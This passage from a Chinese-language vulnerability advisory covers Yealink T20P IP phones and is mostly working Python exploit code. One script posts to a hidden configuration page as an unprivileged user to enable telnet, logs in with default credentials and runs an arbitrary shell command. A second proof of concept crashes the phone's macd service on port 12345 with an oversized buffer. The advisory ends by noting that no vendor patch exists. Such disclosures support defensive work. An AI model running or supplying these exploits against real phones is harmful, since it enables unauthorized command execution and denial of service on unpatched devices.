T20P IP电话隐藏页面安全绕过漏洞(2)

passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
 passman.add_password(None, phoneUrl, webUser, webPass)
 authhandler = urllib2.HTTPBasicAuthHandler(passman)
 opener = urllib2.build_opener(authhandler)
 urllib2.install_opener(opener)
 post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")])

print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl
 pagehandle = urllib2.urlopen(phoneUrl, post_params)

print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass )
 tn = telnetlib.Telnet(phoneIP)

tn.read_until("IPPHONE login: ")
 tn.write(telnetUser + "\n")
 if telnetPass:
    tn.read_until("Password: ")
    tn.write(telnetPass + "\n")

tn.read_until("$")
 print "[*] Executing shell command [ %s ]" % shellCmd
 tn.write( shellCmd + '\n' )
 tn.read_until( shellCmd )
 print tn.read_until("$").strip("$ ")
 tn.write("exit\n")
 tn.read_all()

 [0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC

The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345"

#!/usr/bin/python
 
 import socket,sys,time,struct
 
 if len(sys.argv) < 2:
      print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
      print "[-] Usage: %s <target addr> " % sys.argv[0]
       
    sys.exit(0)
 
 target = sys.argv[1]
 
 if len(sys.argv) > 2:
      platform = sys.argv[2]
 
 buffer = "\x41"*75
 
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 try:
    s.connect((target,12345))
 except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
 print "[*] Sending " + `len(buffer)` + " byte crash"
 
 s.send(buffer + "\r\n")
 s.recv(1024)

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
yealink
 -------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
?ProductsID=64&CateID=187&flag=142